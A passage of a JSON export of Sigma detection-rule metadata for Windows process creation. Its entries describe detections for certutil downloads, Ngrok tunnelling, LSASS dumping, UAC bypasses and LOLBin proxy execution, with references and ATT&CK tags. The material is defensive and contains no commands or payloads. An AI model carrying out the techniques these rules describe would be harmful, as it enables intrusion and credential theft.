"proc_creation_win_powershell_cl_mutexverifiers.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "value": "Potential Script Proxy Execution Via CL_Mutexverifiers.ps1" }, { "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_addinutil_suspicious_cmdline.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "631b22a4-70f4-4e2f-9ea8-42f84d9df6d8", "value": "Suspicious AddinUtil.EXE CommandLine Execution" }, { "description": "Detect use of PDQ Deploy remote admin tool", "meta": { "author": "frack113", 
"creation_date": "2022-10-01", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pdqdeploy_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", "https://www.pdq.com/pdq-deploy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_execution.yml" ], "tags": [ "attack.execution", "attack.lateral-movement", "attack.t1072" ] }, "related": [ { "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", "value": "PDQ Deploy Remote Adminstartion Tool Execution" }, { "description": "Detects potentially suspicious child processes of WinRAR.exe.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_winrar_susp_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/", "https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_susp_child_process.yml" ], "tags": [ "attack.execution", "attack.t1203" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "146aace8-9bd6-42ba-be7a-0070d8027b76", "value": "Potentially Suspicious Child Process Of WinRAR.EXE" }, { "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" 
keyword used in .NET \"reflection.assembly\"", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-03-01", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1059.001", "attack.t1027" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "value": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call" }, { "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. 
Which is often used by attackers to perform AD enumeration.", "meta": { "author": "frack113", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate use of the library for administrative activity" ], "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/samratashok/ADModule", "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml" ], "tags": [ "attack.reconnaissance", "attack.discovery", "attack.impact" ] }, "uuid": "70bc5215-526f-4477-963c-a47a5c9ebd12", "value": "Potential Active Directory Enumeration Using AD Module - ProcCreation" }, { "description": "Detects the execution of Windows binaries from within a WSL instance.\nThis could be used to masquerade parent-child relationships\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wsl_windows_binaries_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ed825c86-c009-4014-b413-b76003e33d35", "value": "Windows Binary Executed From WSL" }, { "description": "Detects 
usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_presentationhost_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_presentationhost_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", "value": "Arbitrary File Download Via PresentationHost.EXE" }, { "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-14", "falsepositive": [ "Another tool that uses the command line switches of Ngrok", "Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "filename": "proc_creation_win_pua_ngrok.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", "https://www.softwaretestinghelp.com/how-to-use-ngrok/", "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", 
"https://twitter.com/xorJosh/status/1598646907802451969", "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", "https://ngrok.com/docs", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ngrok.yml" ], "tags": [ "attack.command-and-control", "attack.t1572" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "value": "PUA - Ngrok Execution" }, { "description": "Detects suspicious renamed SysInternals DebugView execution", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-05-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_sysinternals_debugview.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.epicturla.com/blog/sysinturla", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "value": "Renamed SysInternals DebugView Execution" }, { "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "meta": { "author": "frack113", "creation_date": "2022-01-16", "falsepositive": [ "Legitimate script" ], "filename": "proc_creation_win_msiexec_execute_dll.yml", 
"level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", "value": "Suspicious Msiexec Execute Arbitrary DLL" }, { "description": "Detects WMI script event consumers", "meta": { "author": "Thomas Patzke", "creation_date": "2018-03-07", "falsepositive": [ "Legitimate event consumers", "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "value": "WMI Persistence - Script Event Consumer" }, { "description": "Detects changes to the \"DisableRestrictedAdmin\" registry value in 
order to disable or enable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromised\n", "meta": { "author": "frack113", "creation_date": "2023-01-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md", "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28ac00d6-22d9-4a3c-927f-bbd770104573", "value": "RestrictedAdminMode Registry Value Tampering - ProcCreation" }, { "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", "meta": { "author": "Teymur Kheirkhabarov", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://pentestlab.blog/2017/03/30/weak-service-permissions/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", "value": "Possible Privilege Escalation via Weak Service Permissions" }, { "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1628720819537936386", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml" ], "tags": [ "attack.persistence", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "value": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE" }, { "description": "Detects potential process injection via Microsoft Remote Assistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. 
It has been a target used by many threat actors and used for discovery and persistence tactics", "meta": { "author": "Alexander McDonald", "creation_date": "2022-06-24", "falsepositive": [ "Legitimate use of Msra.exe" ], "filename": "proc_creation_win_msra_process_injection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", "value": "Potential Process Injection Via Msra.EXE" }, { "description": "Detects the malicious use of a control panel item", "meta": { "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "creation_date": "2020-06-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_control_panel_item.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218.002", "attack.persistence", "attack.t1546" ] }, "related": [ { "dest-uuid": "4ff5d6a8-c062-4c68-a778-36fc5edd564f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "value": "Control Panel Items" }, { "description": "Detects a suspicious script execution in temporary folders or folders accessible by environment variables", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military", "https://learn.microsoft.com/en-us/windows/win32/shell/csidl", "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", "value": "Script Interpreter Execution From Suspicious Folder" }, { "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_conhost_uncommon_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_uncommon_parent.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", "value": "Conhost Spawned By Uncommon Parent Process" }, { "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/147", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", "value": "DeviceCredentialDeployment Execution" }, { "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_susp_process_creation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2020/10/08/ryuks-return/", 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "value": "Suspicious Process Created Via Wmic.EXE" }, { "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", "meta": { "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", "value": "Always Install Elevated MSI Spawned Cmd And Powershell" }, { "description": "Detects some Empire PowerShell UAC bypass methods", "meta": { "author": "Ecco", "creation_date": "2019-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", "value": "HackTool - Empire PowerShell UAC Bypass" }, { "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_createminidump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "value": "HackTool - CreateMiniDump Execution" }, { "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. 
This can be abused by threat actors and attackers for data exfiltration", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-02-24", "falsepositive": [ "As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly" ], "filename": "proc_creation_win_certutil_encode.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", "value": "File Encoded To Base64 Via Certutil.EXE" }, { "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/egre55/status/1087685529016193025", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", 
"https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", "value": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE" }, { "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. 
UACMe ID of 41, 43, 58 or 65)", "meta": { "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "creation_date": "2019-07-31", "falsepositive": [ "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/hFireF0X/status/897640081053364225", "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "attack.t1218.003", "attack.g0069", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", "value": "CMSTP UAC Bypass via COM Object Access" }, { "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
This can be used to gather information about the target machine", "meta": { "author": "blueteamer8699", "creation_date": "2022-01-03", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_lolbin_gather_network_info.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gather_network_info.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1615", "attack.t1059.005" ] }, "related": [ { "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", "value": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS" }, { "description": "Detects possible payload obfuscation via the commandline", "meta": { "author": 